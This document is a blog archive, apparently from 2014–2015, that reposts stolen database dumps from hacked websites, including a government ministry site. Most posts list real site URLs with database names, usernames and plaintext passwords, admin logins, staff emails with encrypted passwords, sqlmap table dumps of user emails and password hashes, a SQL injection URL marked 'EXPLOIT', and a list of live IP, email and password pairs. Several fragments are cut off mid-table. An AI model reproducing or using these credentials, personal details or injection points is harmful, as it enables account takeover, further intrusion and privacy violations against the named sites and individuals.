Showing posts with label Database Dump - Leaked. Show all posts
Showing posts with label Database Dump - Leaked. Show all posts

Saturday, April 18, 2015

List of Website hacked - datebase

  1. ---------------------------
  2. http://www.sociolus.com/
  3. DB name : db174579_socjan
  4. DB user : db174579_dham
  5. DB pass : m1ndtricks
  6. DB host : internal-db.s174579.gridserver.com
  7. ---------------------------
  8. http://netsoltech.netsolbeta.com/
  9. DB name : netsol10_wp129
  10. DB user : netsol10_wp129
  11. DB pass : 4fSn5P1jqo
  12. DB host : localhost
  13. ---------------------------
  14. http://sliceofwisconsin.com/
  15. DB name : sliceofw_wp640
  16. DB user : sliceofw_wp640
  17. DB pass : q$Q$P1S45A
  18. DB host : localhost
  19. ---------------------------
  20. http://stuffnstuff.com/
  21. DB name : datoptal_wp501
  22. DB user : datoptal_wp501
  23. DB pass : 8hykkuSP91
  24. DB host : localhost
  25. ---------------------------
  26. http://www.farmvillas.com.pk/
  27. DB name : fvillas_wp923
  28. DB user : fvillas_wp923
  29. DB pass : g89.]f51PS
  30. DB host : localhost
  31. ---------------------------
  32. http://www.nelbrokers.co.za/
  33. DB name : nelbroke_wp286
  34. DB user : nelbroke_wp286
  35. DB pass : aM2P]6S)l6
  36. DB host : localhost
  37. ---------------------------
  38. http://www.queenofafrika.co.za/
  39. DB name : queenofa_wZp922
  40. DB user : queenofa_wZp922
  41. DB pass : PS58sf7d81
  42. DB host : localhost
  43. ---------------------------
  44. http://ritasbeautycare.com/
  45. DB name : ritasbea_rdb
  46. DB user : ritasbea_radmin
  47. DB pass : tO[[(;L-f*5,
  48. DB host : localhost
  49. ---------------------------

Another Website hacked Admin Login

  1. ---------------------------
  2. Host IP:                94.126.40.42
  3. Web Server:     Apache
  4. Powered-by:     PHP/5.3.28
  5. DB Server:      MySQL >=5
  6. Resp. Time(avg):        4241 ms
  7. Current User:   LCN123340_aeUsr@10.1.4.36
  8. Sql Version:    5.0.95-log
  9. Current DB:     geopolicity_ae_geopolicity
  10. System User:    LCN123340_aeUsr@10.1.4.36
  11. Host Name:      mysql1.hostingweb.co.uk
  12. Installation dir:       /usr/
  13. DB User:        'LCN123340_aeUsr'@'%'
  14. Data Bases:     information_schema
  15.                 geopolicity_ae_geopolicity
  16. http://www.geopolicity.ae/             
  17. Users:Administrator
  18. Pass:amiamba1965
  19. Users:silkroad
  20. Pass:geo1234
  21. Users:cvuser
  22. Pass:geo1234
  23. ---------------------------

Website Admin Login Info - Database Hack

  1. ---------------------------
  2. http://www.fourway.ae/
  3. Host IP:                67.222.133.157
  4. Web Server:     Apache
  5. Powered-by:     PHP/5.4.34
  6. DB Server:      MySQL >=5
  7. Resp. Time(avg):        554 ms
  8. Current User:   fourway_way@localhost
  9. Sql Version:    5.5.37-cll
  10. Current DB:     fourway_four
  11. System User:    fourway_way@localhost
  12. Host Name:      core18.hostingmadeeasy.com
  13. Installation dir:       /usr
  14. DB User:        'fourway_way'@'localhost'
  15. Data Bases:     information_schema
  16.                 fourway_four
  17. user:admin
  18. pass:fourway
  19. ---------------------------

List of Website Database Hacked !

  1. http://webseekers.in/
  2. DB name : webseeke_wp
  3. DB user : webseeke_webdb
  4. DB pass : wskapwdhai@2014
  5. DB host : localhost
  6. ---------------------------
  7. http://www.pleasure-desire.gr
  8. DB name : pleasus7_wrd13
  9. DB user : pleasus7_wrd13
  10. DB pass : 3J9voERjQc
  11. DB host : localhost
  12. ---------------------------
  13. http://www.realtexdevelopment.com
  14. DB name : realtexd_wor2
  15. DB user : realtexd_wor2
  16. DB pass : vuFDa04m
  17. DB host : localhost
  18. ---------------------------
  19. http://www.saugatuckrowing.com
  20. DB name : saugatu2_wor3
  21. DB user : saugatu2_wor3
  22. DB pass : ZspIPH98
  23. DB host : localhost
  24. ---------------------------
  25. http://www.test.advanceprotech.com
  26. DB name : advandz0_wor13
  27. DB user : advandz0_wor13
  28. DB pass : hI3z69Y8
  29. DB host : localhost
  30. ---------------------------
  31. http://www.utahseopros.com
  32. DB name : latestba_wor5
  33. DB user : latestba_wor5
  34. DB pass : MAuXY47x
  35. DB host : localhost
  36. ---------------------------
  37. http://www.fuerzanlcc.org
  38. DB name : boogiegr_wor9
  39. DB user : boogiegr_wor9
  40. DB pass : i8CaUE7I
  41. DB host : localhost
  42. ---------------------------
  43. http://www.zbaked.com/
  44. DB name : ab19614_zbaked
  45. DB user : ab19614_zbaked
  46. DB pass : NdXP_W{1+q$K
  47. DB host : localhost
  48. ---------------------------
  49. http://reliablegulf.ae/
  50. DB name : reliable_reliable
  51. DB user : reliable_reliable
  52. DB pass : Pass123
  53. DB host : localhost
  54. ---------------------------
  55. http://www.culligan.ae/
  56. DB name : culligan_wp
  57. DB user : culligan_admin
  58. DB pass : HGz618n9wj
  59. DB host : localhost
  60. ---------------------------

Mof.gov.il Hacked with USers Dump and Encrypted Password

  1. EXPLOIT: http://gemelnet.mof.gov.il/Views/haavaratKupotPerut.aspx?idKupa=600%27
  2.  
  3. An error has occurred during report processing. (rsProcessingAborted)
  4. Query execution failed for dataset 'DataSet1'. (rsErrorExecutingCommand)
  5. For more information about this error navigate to the report server on the local server machine, or enable remote errors
  6.  
  7. ---------------------------------------
  8. gabbi@CUSTOMS.MOF.GOV.IL
  9. password:s45cospaHcR=
  10. -----------------
  11. email:yitzchak@mof.gov.il
  12. password:6z1ctpbHecE=
  13. ------------------
  14. emial:nimrodav@mof.gov.il
  15. password:EQ7fIpT7i/Q=
  16. -----
  17. emil:apatrik@mof.gov.il
  18. passord:Kp9EiyCLrrg=
  19. -----
  20. email:avigail@mof.gov.il
  21. password:afWoURQsEUg=
  22. ----
  23. email:shorvitz@mof.gov.il
  24. password:EQ7fIpT7i/Q=
  25. -------------------
  26. email:davide@mof.gov.il
  27. password:83hwuMWLzHM=
  28. -----------------------
  29. password:davide@mof.gov.il
  30. paswoord:83hwuMWLzHM=
  31. ------------------
  32. barakr@mof.gov.il
  33. password:EycUK6qZ7ioxG6CatHBw==
  34. -------------------------

Saturday, March 28, 2015

Website Hack - Database Username and Password leak

http://www.economysuperstar.com/  
Database Username : econo2_trashwago
Database Password : foxhead
-----------------------------------
http://pagesgays.fr/
Database Username : dbo423482245
Database Password : suzuki650
-----------------------------------
http://blog-haus.sven-und-tina.de/
Database Username : dbo323164979
Database Password : Tina2008 


Thursday, February 26, 2015

Website Login Info - Username and Password

Database: cofi
Table: PasswordProtect_Users
[11 entries]
+---------------+-------------+
| username      | password    |
+---------------+-------------+
| choward       | Rose12      |
| andi          | andi        |
| mcarter       | Serge!      |
| webmaster     | Archit3ct0n |
| ryan          | ryan        |
| scmember      | Watch5098   |
| specialpapers | N0tl0c      |
| Handbook      | Theological |
| rbmember      | Church1869  |
| rbexecutive   | Charter1870 |
| andrew        | andrew12    |
+---------------+-------------+

[14:39:49] [INFO] table 'cofi.PasswordProtect_Users' dumped to CSV file '/tmp/sqlmapdumpRCm4Mb/cofi/PasswordProtect_Users.csv'
[14:39:49] [INFO] fetched data logged to text files under '/tmp/sqlmapoutputr_Olqm/www.synod.ireland.anglican.org'

[*] shutting down at 14:39:49

bye bye

http://pastebin.com/raw.php?i=1CLS4XEV

Monday, January 26, 2015

Host USER and PASSWORD - Hacked

## Open a connection
con <- artist="suricato" artista="" as.integer="" banco="" by="" con="" consulta="" count="" created="" d="" dbconnect="" dbgetquery="" dbname="superstars" difft="" drv="" from="" group="" host="192.168.0.119" jan1="" m-="" no="" order="" para="" password="hackfest" port="5432" pre="" q="" strptime="" tweets="" um="" user="postgres" week="" where="">

Website Admin and Password - Hacked

--
-- Databáze: `minicup-2015`
--

INSERT INTO `user` (`id`, `username`, `password_hash`, `role`, `fullname`) VALUES
(1, 'joe', '$2y$10$HZGTs1GzZB70Bbpc2HLnFeyBYdaudLWW/gOd7CVEcpf8C4nURUVRi', 'admin', 'Joe Kolář');

-- --------------------------------------------------------

--
-- Struktura tabulky `year`
--.

Source: http://pastebin.com/raw.php?i=DF2txkSi

Website Login Info Leaked - Hacked

http://www.logobee.com/logo-design-samples/logo-design-samples.php?c=2

===============================================================
Database: logobee_logobee
Table: lb_users
[1 entry]
+----------+------------------------------------------+
| username | password                                 |
+----------+------------------------------------------+
| admin    | 634d6bc5d417c25fb285e05d42817b759bd6a982 |
+----------+------------------------------------------+

Wednesday, January 21, 2015

Website User Dump

y@hotmail.com
izacki  $2a$08$DaWluEr1I2mI8arYkCrDEODQ90boC05NZ8uwzu5X5RVRCXWQRsuUi  izik@post.com  
Gio  $2a$08$syM5kq2KMmUI0N674Vnl1epbPOlfeT3E0phkiT/bf3.rqA/Uyx6rW  mail@racah.net  
ariel77  $2a$08$pOHkUn7cPFNizDU1vhqL2Oahk6lwedUD.TyzNErd603osnd3lD.8q  aribelinco@yahoo.com  
I Phone Man  $2a$08$XXsboObqjYzhJdUo8hpxRe4qAlJMDAiYDIinneZLOMOrUnG9gs30W  liav_g5@walla.com
Detected 1 occurrence(s) of ‘^target:\s*(http|www)':
#OpIsrael
#Lulz_is_in_the_air


Target:  http://forum.mac-it.co.il
Date:          19/01/2015 1:18:39
DB Detection:  MySQL >=5
Method:  GET
Type:          String
Data Base:  macit_forum
Table:  users
Total Rows:  4805

user  pass  email  msn
aylah policar  $2a$08$Yjuz9wICXh8ZA7gXbSlrZ./M1u3m

Sunday, January 11, 2015

Website Users Table Dump with Email and Password

BBRFbiXUEbBBbaNAbbFFbeZ0 loa@hvitahusid.is
NHCGOcERFgFUUC9ZHCEWSC1V1 cathya_santos@yahoo,com
QbAUIDBKLCHZKecDRCHVJGDWZGCILEcML1CHOFcPEecCLbARZbDR1 inadeuna12@yahoo.com
CbcAL6cOL4cOHBcPQ3cEJgFRC4cDRgGSTICIXhgF1 
UCHWXFcNCcEUGgDSBBAWVGbLQabBEBDVQDBHKCbP1 isabella.argo@gmail.com
IBFGVHBIFc1HNc1DPgDEFf6DMcJXTEcW0 felclean2003@gmail.com
Detected 1 occurrence(s) of ‘^target:\s*(http|www)':
Target: http://www.heimastore.com/product-list.php?my-apartment=%Inject_Here%12%27
Date: 11.01.2015 08:18:30
DB Detection: MySQL (Auto Detected)
Method: GET
Type: Integer (Auto Detected)
Data Base: db90154_heimadb
Table: ct_customers
Total Rows: 738

CT_Custo

Thursday, December 18, 2014

MYSQL Table Dump

| it@reintjes-gears.de            | admin_reintjes | 6bd8b077b8e8309f9ee6eb9fdbe
700dc:Dk7KV8ko3vqCjQh57GGbLm8iLw9OHvTX |
| j.heinze@kessler-studios.de     | joern          | 92e45b356009d0a4a878653a120
083dc:ZCIcTxo6qOAcqyELce24lo0inFyuusph |
| Jona.Schwinge@reintjes-gears.de | jschwinge      | c29257034b95888c2728926192b
ebab0:pFMtMc3Qjc0xmirpGyMEIrEPbFVZpVYA |
| Kathy.Brand@reintjes-gears.de   | kbrand         | 3e039ac95b54799591ab831388e
507e1:JoWaJW2EQIyev3nsCgY0X0vEWqjRqVtV |
| plv@reintjes-gears.de           | plv            | 
Detected 1 occurrence(s) of ‘\|\s+Pass(word)*\s+\|':
========================

Database: 1965m2840
Table: jore_users
[9 entries]
+---------------------------------+----------------+----------------------------
---------------------------------------+
| email                           | username       | password
                                       |
+---------------------------------+----------------+----------------------------
---------------------------------------+
|                          | administrator  | 0282d88d20a393bd8eaa6ec0733
cde03                                  |
| 

MYSQL Table Dump USERS

le for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: mysql
Table: user
[8 entries]
+-----------+------------------+------------------+
| Host      | User             | Password         |
+-----------+------------------+------------------+
| localhost | pma_b2w7NB4O0c7P | 0ff992f955f90a16 |
| localhost | pp_sb_db         | 0d3def23369ff815 |
| localhost | apsc             | 002b4bdf6896cbb7 |
| localhost | admin            | 636b91805

Wednesday, December 17, 2014

Database Dump

l         | david           | dally@yahoo.com       | Admin       | davidade  | davidally     |
| 9  | NULL                     | lalalalla       | lalalla@lalala.com    | Admin       | lalala    | 12345         |
| 10 | NULL                     | viaman          | amh@amh.fr            | Admin       | viaman    | aimane@150966 |
+----+--------------------------+-----------------+-----------------------+-------------+-----------+---------------+



Database: nilsdbb
Table: userlogin
[2 entries]
+----+-------------+----------+
| ID 
Detected 1 occurrence(s) of ‘(h[a4]ck[e3]d|[p0]wn[e3]d|d[e3]f[a4]c[e3]d) by':
             
                                                 =============================== 
                                                       #H4CKED BY BACKDOoR
                                                 ===========<><><><>============
                                                    #TAKEDOWN TEAM SINCE 2014
                                                 ===============================

Detected 3 occurrence(s) of ‘\| (user|username|login|password|email|uid) \|':
viaman    | aimane@150966 |
+----+--------------------------+-----------------+-----------------------+-------------+-----------+---------------+



Database: nilsdbb
Table: userlogin
[2 entries]
+----+-------------+----------+
| ID | Username    | Password |
+----+-------------+----------+
| 0  | dayo        | xdayox   |
| 1  | admin_nsiwc | zuwvmuc3 |
+----+-------------+----------+
Detected 6 occurrence(s) of ‘\|\s+Pass(word)*\s+\|':
viaman    | aimane@150966 |
+----+--------------------------+-----------------+-----------------------+-------------+-----------+---------------+



Database: nilsdbb
Table: userlogin
[2 entries]
+----+-------------+----------+
| ID | Username    | Password |
+----+-------------+----------+
| 0  | dayo        | xdayox   |
| 1  | admin_nsiwc | zuwvmuc3 |
+----+-------------+----------+
Detected 7 occurrence(s) of ‘(\| [a-z0-9\-\._]+@\S+\.[a-z]{2,4} \| \S+)':
| ope             | ope@ope.com           | Secretariat | opeyemi   | opey          |
| 6  | NULL                     | alfred ako      | alf@afafag.com        | member      | alfred    | alfred        |
| 7  | 9we6mqc3fyzt4sm9qqwqn121 | clement         | clementyari@yahoo.com | Admin       | clement   | health        |
| 8  | l10bu46qrzlbubll         | david           | dally@yahoo.com       | Admin       | davidade  | davidally     |
| 9  | NULL                     | lalalalla       | lalalla@lalala.com    | Admin       | lalala   

MYSQL Dump with Email and Password

Live | 24.93.115.10:39002 | melissahp2003@yahoo.com | 102059 | User ID: melissahp2003 | melissa pineda | [CRE:37]
Live | 173.49.196.83:58735 | vachovetz@aol.com | wolves1 | User ID: vachovetz | marie vachovetz | [CRE:35]
Live | 50.186.96.169:53559 | sexyblackbudafly@aol.com | catdog | User ID: sexyblackbudafly | Nicole Bennett | [CRE:33]

MYSQL Users Dump

   | WelcomeMessage              |
+----+-----------------------------+------------------+-----------------------------+-------------------+-----------------------------+
| 1  | http://twitter.com/@Codiing | Hacked ~ Codiing | http://twitter.com/@Codiing | hacked@lobbies.ml | http://twitter.com/@Codiing |
+----+-----------------------------+------------------+-----------------------------+-------------------+-----------------------------+
Detected 1 occurrence(s) of ‘(h[a4]ck[e3]d|[p0]wn[e3]d|d[e3]f[a4]c[e3]d) by':
                                  | BannerURL | BannerAlt | BannerSize | BannerType | BannerFile |
+----------+-----------------------------------------------------------------+-----------+-----------+------------+------------+------------+
| 2        | Hacked by Codiing ~ GG |    |    | 468x60     | link_code  |     |
| 3        | Hacked                                                          |    |    | 468x60     | link_code  | 
Detected 1 occurrence(s) of ‘\| (user|username|login|password|email|uid) \|':
s_catalog    |
| books_content    |
| books_members    |
| books_newsletter |
| books_settings   |
+------------------+

Database: salamman_adsensebooks
Table: books_admin
[1 entry]
+---------+--------------+----------+
| AdminID | username     | password |
+---------+--------------+----------+
| 1       | adsensebooks | adadbo11 |
+---------+--------------+----------+

Database: salamman_adsensebooks
Table: books_banners
[2 entries]
+----------+-------------------------------------------------------
Detected 2 occurrence(s) of ‘\|\s+Pass(word)*\s+\|':
-------+

Database: salamman_adsensebooks
Table: books_members
[7 entries]
+----------+-------------------------+---------------+--------------------------+------------+
| MemberID | email                   | username      | YourName                 | password   |
+----------+-------------------------+---------------+--------------------------+------------+
| 1        | iniakunku@gmail.com     | iniakunku     | ini akunku               | akunku     |
| 2        | akujuga@gmail.com       | akujuga       | aku jug
Detected 2 occurrence(s) of ‘(\| [a-z0-9\-\._]+@\S+\.[a-z]{2,4} \| \S+)':
  | WelcomeMessage              |
+----+-----------------------------+------------------+-----------------------------+-------------------+-----------------------------+
| 1  | http://twitter.com/@Codiing | Hacked ~ Codiing | http://twitter.com/@Codiing | hacked@lobbies.ml | http://twitter.com/@Codiing |
+----+-----------------------------+------------------+-----------------------------+-------------------+-----------------------------+

Database username and password

escription'.$k.$i.$j]; ?>
          
connect_error){ die("Connection failed: ". $conn->connect_error); } //echo $this->patch; $tmp = $this->pat

Tuesday, December 16, 2014

Database Userid and Password

                                        driver="org.h2.Driver"
                                        url="jdbc:h2:${basedir}/target/wso2carbon-core-4.2.0/repository/database/WSO2CARBON_DB"
                                        userid="wso2carbon" password="wso2carbon" autocommit="true"
                                        onerror="continue">
                                    
                                        
                                    
      

Wednesday, December 10, 2014

Database Dump - Exploited Information

ail: jackthis [ @ ] yandex.com
your email: hijackthis [ @ ] contbay.com [trashmail? lel]
your email: codepro [ @ [ unseen.is
your email: mox [ @ ] proxymail.eu

your facebook: codepro.1992
your facebook: theycall mejames
your facebook: upsxrux


database dumps
--------------
user: Busta
email: Jackthis [ @ ] yandex.com
hash:
7d50ae6e0c0fc3dddea69bea97c58bdab240f3d2fdf136d8a48a4dcae8ce7789624d1ed6dcdd2c63
password: vGifALv3ao7S5oc
--------------
user: Ups.
email:
hash: bfdac6008f9cab4083784cf3jbd1874f

Contact Form

Name

Email *

Message *